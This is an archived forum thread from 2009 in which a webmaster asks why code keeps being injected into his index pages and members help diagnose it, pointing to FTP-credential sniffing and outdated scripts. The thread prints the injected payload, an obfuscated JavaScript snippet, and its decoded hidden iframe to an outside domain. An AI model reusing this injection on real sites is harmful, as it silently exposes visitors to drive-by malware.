WEB What does this mean and how do I stop it?

Discussion in 'OT Technology' started by upparoom, May 26, 2009.

  1. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
    somehow, someone keeps injecting code into my index.htm and index.html files on my webserver

    they inject even though I set read only permisssion to the files

    it was in CharCode translated to this

    Code:
    
    var xew=453800543;var ghg45="nuot";var w="o";var re6="ll.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>'); var jhr4=4324224
    
    

    anybody tell me what this means?
     
  2. shaitaan

    shaitaan New Member

    Joined:
    Jul 12, 2002
    Messages:
    49,620
    Likes Received:
    0
    Location:
    Bay Area, CA / NYC
    looks like malware :(
     
  3. Insert Tokens

    Insert Tokens Making Cancer My Bitch OT Supporter

    Joined:
    Jan 12, 2006
    Messages:
    8,329
    Likes Received:
    75
    Location:
    Tasmania
    Code:
    <iframe src="http://nuotoll.com/" width="1" height="3"></iframe>
    I'd highly recommend not visiting that site :p
     
  4. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
    Im mostly trying to figure out how theyre gettting into my server.

    I have Endpoint on it and I've scanned it with spybot and malwarebytes and found 0 issues.
     
  5. LowClass

    LowClass New Member

    Joined:
    Sep 5, 2007
    Messages:
    890
    Likes Received:
    0
    Location:
    USA
    I got the same thing last week on two of my ecommerce sites. both regretfully hosted on 1and1 but sperate servers. I changed every password (site/ftp/client login/etc) and removed it. has not come back since.
     
  6. JesterFX

    JesterFX New Member

    Joined:
    Oct 10, 2004
    Messages:
    4,557
    Likes Received:
    0
    Probably just some script somewhere on your server that is outdated and someone is using some exploit to get in.

    I had someone do that on a wordpress site and probably got in through my way outdated VB.
     
  7. tryfuhl

    tryfuhl New Member

    Joined:
    Oct 4, 2003
    Messages:
    75,450
    Likes Received:
    0
    Location:
    MD/DC Metro
    Where are these files being uploaded from? There's newer malware that does this locally and you could be uploading the files without knowing it; be sure to check your files.

    Could easily be an exploited script on your server though.
     
  8. JesterFX

    JesterFX New Member

    Joined:
    Oct 10, 2004
    Messages:
    4,557
    Likes Received:
    0
    Every time it has happened to me I had my host check the logs and they never see anything obviously suspicious. Meaning they are getting in and finding the login info somehow through one of the scripts.

    It's one of the worst parts about having a ton of sites and not enough time to keep all the various scripts updated all the time.
     
  9. Zephyr

    Zephyr New Member

    Joined:
    Jul 30, 2007
    Messages:
    9,557
    Likes Received:
    0
    Location:
    Ahnold Land
    how do you people realize this stuff like an obscure line of code injected into your index page?
     
  10. JesterFX

    JesterFX New Member

    Joined:
    Oct 10, 2004
    Messages:
    4,557
    Likes Received:
    0
    when my host emails me and says I need to clean it up lol. Found a few that had that google warning page that "this site may contain dangerous files" lol.
     
  11. Insert Tokens

    Insert Tokens Making Cancer My Bitch OT Supporter

    Joined:
    Jan 12, 2006
    Messages:
    8,329
    Likes Received:
    75
    Location:
    Tasmania
    Shared hosting or dedi?
     
  12. ge0

    ge0 New Member

    Joined:
    Oct 31, 2005
    Messages:
    8,398
    Likes Received:
    0
    Location:
    JERSEY
    well, if you have anything on your index page that references a URL param, that could be a start
     
  13. tryfuhl

    tryfuhl New Member

    Joined:
    Oct 4, 2003
    Messages:
    75,450
    Likes Received:
    0
    Location:
    MD/DC Metro
  14. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
    dedicated. sitting in a datacenter about 10 miles from me in a rack I own.
     
  15. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
  16. Zephyr

    Zephyr New Member

    Joined:
    Jul 30, 2007
    Messages:
    9,557
    Likes Received:
    0
    Location:
    Ahnold Land
    so how do you find these things out? look at the last modified date?
     
  17. dazmanultra

    dazmanultra New Member

    Joined:
    Jun 17, 2002
    Messages:
    34,795
    Likes Received:
    0
    Location:
    English Countryside
    Check the FTP logs on the server... find out how the file got there, when it was last modified etc.

    We mainly see these on our systems when users have malware on their PC. We've seen malware that intercepts FTP connections and sniffs the username and password - so even if you're not typing the details it can grab the stuff.

    Also, watch where you're accessing your website from. Look out for unsecure or untrusted wi-fi networks, Plain FTP is unencrypted...
     
  18. tryfuhl

    tryfuhl New Member

    Joined:
    Oct 4, 2003
    Messages:
    75,450
    Likes Received:
    0
    Location:
    MD/DC Metro
    regardless, some of the removal/security tactics will remain the same
     
  19. tryfuhl

    tryfuhl New Member

    Joined:
    Oct 4, 2003
    Messages:
    75,450
    Likes Received:
    0
    Location:
    MD/DC Metro
    werd werd

    I got some nasty shit and had to hand clean my files
     
  20. LowClass

    LowClass New Member

    Joined:
    Sep 5, 2007
    Messages:
    890
    Likes Received:
    0
    Location:
    USA
  21. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
    IIS logs dont show anything out of the ordinary around the time this happened. Logon/Logoff doesnt show anyone but the people who can be accounted for.

    I'm thinking this could be a virus on someone's machine so Ive asked everyone to run a full scan.

    so far I'm keeping an eye on it, but it looks like they havent changed/tried to change anything in the last 4 days
     
  22. maxxpower

    maxxpower OG Lauren Crew - Observer OT Supporter

    Joined:
    May 27, 2007
    Messages:
    26,348
    Likes Received:
    0
    do you have any open source apps installed, wordpress, forums etc?
     
  23. 95vr4

    95vr4 OT Supporter

    Joined:
    Oct 6, 2004
    Messages:
    2,513
    Likes Received:
    0
    Location:
    Weddington, NC
    Did you use the M$ Log parser?
     
  24. upparoom

    upparoom OT Supporter

    Joined:
    Jun 4, 2002
    Messages:
    94,036
    Likes Received:
    88
    Location:
    Houston
    I'm using VBulletin for forums and Wordpress for a blog. Looks like we were able to find the guy with the infection.

    I locked out his account until I get proof of a clean system
     

Share This Page